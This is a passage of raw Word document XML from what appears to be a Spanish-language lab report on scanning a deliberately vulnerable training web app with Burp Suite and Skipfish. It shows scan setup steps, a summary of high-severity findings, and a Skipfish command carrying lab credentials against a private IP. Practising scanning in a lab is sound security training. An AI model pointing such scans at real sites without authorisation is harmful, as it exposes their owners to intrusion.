    <w:p w14:paraId="1782D11D" w14:textId="4B90890F" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FEFD7E9" wp14:editId="11E95FFA">
            <wp:extent cx="5400040" cy="160147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601470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E6E15D" w14:textId="7BAAC0C2" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33FCEBA0" wp14:editId="1551BC1F">
            <wp:extent cx="5400040" cy="1725295"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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1725295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1C7F6" w14:textId="67D86878" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="742CA526" w14:textId="239DB3A9" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E6943E" wp14:editId="7D32DEE3">
            <wp:extent cx="5400040" cy="170116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701165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74022459" w14:textId="440A6B18" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D8C648D" wp14:editId="62431F08">
            <wp:extent cx="5400040" cy="228917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289175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB54DA" w14:textId="04B071FE" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1732DE3F" wp14:editId="3EDB78A7">
            <wp:extent cx="5400040" cy="419544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4195445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011D027" w14:textId="75358430" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Y ahora los tipos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211D2963" w14:textId="375E051B" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9595E2" wp14:editId="21543ABC">
            <wp:extent cx="5400040" cy="230759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307590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6A93D" w14:textId="319BD307" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58B5C9D3" wp14:editId="50A052F8">
            <wp:extent cx="5400040" cy="2449830"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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449830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB92B4" w14:textId="3E0A5F17" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEEC1C9" w14:textId="797A73D0" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Esto es un falso positivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B9DC36" w14:textId="1A16FC3A" w:rsidR="00952589" w:rsidRDefault="00952589" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00952589">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31BB850C" wp14:editId="31B223DF">
            <wp:extent cx="5400040" cy="2244725"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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244725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED70B38" w14:textId="2B807D08" w:rsidR="00952589" w:rsidRDefault="00E7319F" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E7319F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BA9D0E4" wp14:editId="6D77E45C">
            <wp:extent cx="5400040" cy="2529205"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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529205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B496D0D" w14:textId="484F814C" w:rsidR="00E7319F" w:rsidRDefault="00E7319F" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E7319F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E8FDA84" wp14:editId="2B432303">
            <wp:extent cx="5400040" cy="23685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368550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D20229E" w14:textId="44DCD15A" w:rsidR="001269E5" w:rsidRDefault="001269E5" w:rsidP="00610328">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC00239" w14:textId="28E32C97" w:rsidR="00D00BAB" w:rsidRDefault="001269E5">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc128034156"/>
      <w:r>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="2E325427" w14:textId="5BD337F4" w:rsidR="00D00BAB" w:rsidRDefault="00D00BAB" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51167909" w14:textId="5B3D7EDD" w:rsidR="00D00BAB" w:rsidRDefault="00D00BAB" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Primero creo un proyecto nuevo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828D3D2" w14:textId="6138C4A4" w:rsidR="00D00BAB" w:rsidRDefault="00D00BAB" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00D00BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1834E741" wp14:editId="7A476D72">
            <wp:extent cx="5400040" cy="3821430"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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3821430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCB80B" w14:textId="00A88ECE" w:rsidR="00D00BAB" w:rsidRDefault="00D00BAB" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora le doy a new scan, y añado la URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B2E28" w14:textId="59A68CA6" w:rsidR="00A82715" w:rsidRDefault="00A82715" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656E929F" w14:textId="75030855" w:rsidR="00A82715" w:rsidRDefault="00A82715" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A82715">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="560EA7B9" wp14:editId="07A58C46">
            <wp:extent cx="5400040" cy="4430395"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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4430395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="106399D8" w14:textId="038F718C" w:rsidR="00A82715" w:rsidRDefault="00A82715" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora en Scan </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>configuración</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Deep:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC3BEF" w14:textId="282404FC" w:rsidR="00A82715" w:rsidRDefault="00A82715" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E00421" w14:textId="5E3758A5" w:rsidR="00A82715" w:rsidRDefault="00A82715" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A82715">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="176519BE" wp14:editId="41BF2D3D">
            <wp:extent cx="5400040" cy="447738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4477385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50A9D5" w14:textId="15453FF3" w:rsidR="00A82715" w:rsidRDefault="00A82715" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB30AA5" w14:textId="0E8F746B" w:rsidR="00A82715" w:rsidRDefault="00A82715" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Añado el usuario y la contraseña, para que </w:t>
      </w:r>
      <w:r w:rsidR="00370303">
        <w:t>pueda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00370303">
        <w:t>iniciar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00370303">
        <w:t>sesión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE3239" w14:textId="5F0BE282" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00370303">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252B95A5" wp14:editId="442BCAB2">
            <wp:extent cx="5400040" cy="4453255"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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4453255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD78E1" w14:textId="42DA07EA" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416E807D" w14:textId="3855E6F6" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Por último, pulso en OK, para que empiece a escanear la página:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A2AD5" w14:textId="534EDD65" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00370303">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44366AF9" wp14:editId="7F625A1F">
            <wp:extent cx="5400040" cy="579374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5793740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1390436F" w14:textId="207F3C66" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3CE288" w14:textId="40906F1E" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00370303">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6543BE35" wp14:editId="4975A038">
            <wp:extent cx="5400040" cy="579374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5793740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003A586" w14:textId="07791384" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEE5E92" w14:textId="2DC2EF3A" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Resultados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A60420A" w14:textId="49D2356D" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20586E7E" w14:textId="0EBB4B7B" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00185DA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BA1B728" wp14:editId="18083A8F">
            <wp:extent cx="5400040" cy="579374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5793740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="424B64C2" w14:textId="63BE81E2" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E899AFA" w14:textId="4DA110FE" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora vamos a ver la vulnerabilidades encontradas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715C5F4" w14:textId="3F5BD9D4" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00185DA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="044F6114" wp14:editId="7AEF09E7">
            <wp:extent cx="5400040" cy="227584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75840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C07E0C" w14:textId="6785287A" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tenemos 15 de nivel alto, que se dividen en varios tipos:XSS,Http response header injection,File path transversal,Cleartext submission of password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45E1F5" w14:textId="52FA62D2" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AAE04ED" w14:textId="48D73D47" w:rsidR="00185DA4" w:rsidRDefault="00312E63" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>En cuanto</w:t>
      </w:r>
      <w:r w:rsidR="00185DA4">
        <w:t xml:space="preserve"> al nivel medio no tenemos ninguna:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630D02F" w14:textId="7456F4E6" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00185DA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46FE0E92" wp14:editId="50EC4557">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C63715F" w14:textId="77777777" w:rsidR="00185DA4" w:rsidRDefault="00185DA4" w:rsidP="00D00BAB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139146A5" w14:textId="4BAC9ED3" w:rsidR="00370303" w:rsidRDefault="00370303" w:rsidP="00C411C4">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E73401A" w14:textId="12AF23C7" w:rsidR="00370303" w:rsidRDefault="00C411C4">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc128034157"/>
      <w:r>
        <w:t>SkipFish</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="63FC35CC" w14:textId="5DA8CF44" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30243CB8" w14:textId="56B7AF9E" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Para usar esta herramienta, ejecutaré el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9337D" w14:textId="7F2436AE" w:rsidR="00C411C4" w:rsidRPr="008353EE" w:rsidRDefault="008353EE" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00C411C4" w:rsidRPr="008353EE">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">Skipfish -o informeGruyere -A alesander:abc123. </w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:history="1">
        <w:r w:rsidR="00C411C4" w:rsidRPr="008353EE">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:color w:val="44546A" w:themeColor="text2"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/627840037480778722812315839194576695652</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5EAC60" w14:textId="1B722CA1" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-o, indica como se va llamar el informe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC959E6" w14:textId="52FEDCEF" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-A, es para introducir el nombre de usuario y contraseña para l autentificación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CBFDF8" w14:textId="77777777" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9D90B2" w14:textId="5E502889" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00C411C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1455465E" wp14:editId="410422CB">
            <wp:extent cx="5400040" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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1935480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="443009C1" w14:textId="23E36672" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00C411C4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DDE8B9" wp14:editId="63EEB4A8">
            <wp:extent cx="5400040" cy="3371215"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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3371215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E61A9" w14:textId="77777777" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193051FA" w14:textId="335C4957" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76764FDD" w14:textId="4731149B" w:rsidR="00C411C4" w:rsidRDefault="00C411C4" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F05095" w14:textId="7B9AC803" w:rsidR="00C411C4" w:rsidRDefault="002F3AD1" w:rsidP="00C411C4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="002F3AD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F162F34" wp14:editId="5B2D802B">
            <wp:extent cx="5400040" cy="4510405"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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4510405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF8057C" w14:textId="74F7638D" w:rsidR="002F3AD1" w:rsidRDefault="002F3AD1" w:rsidP="00C411C4">
      <w:pPr>
